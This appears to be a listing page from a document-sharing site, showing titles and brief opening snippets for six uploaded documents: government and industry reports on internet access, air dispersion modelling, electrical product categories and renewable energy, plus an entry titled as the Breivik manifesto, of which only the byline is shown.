FALLING THROUGH THE NET: TOWARD DIGITAL INCLUSION A Report on Americans’ Access to Technology Tools October 2000 U.S. Department of Commerce Economic and Statistics Administration National Telecommuni...

More info »
AndersBehringBreivikManifesto

AndersBehringBreivikManifesto

2011 , London – By Andrew Berwick

More info »
AERMOD: Description of Model Formulation

AERMOD: Description of Model Formulation

AERMOD: DESCRIPTION OF MODEL FORMULATION

More info »
50305352

50305352

THE RELATIONSHIP BET WEEN LOCAL CONTENT, INTERNET DEVELOPMENT AND ACCESS PRICES This research is the result of collaboration between the Internet Society (ISOC), the in 2011 Organisati on for Economic...

More info »
UL White Book

UL White Book

GUIDE INFORMATION FOR ELECTRICAL EQUIPMENT THE WHITE BOOK 2015-16 UL PRODUCT CATEGORIES CORRELATED TO THE 2011 AND 2014 NATIONAL ELECTRICAL CODE® UL’s General Guide Information is updated daily. To co...

More info »
17 8652 GSR2018 FullReport web final

17 8652 GSR2018 FullReport web final

RENE WA BL E S 2018 GLOBAL STATUS REPORT A comprehensive annual overview of the state of renewable energy. 2018

More info »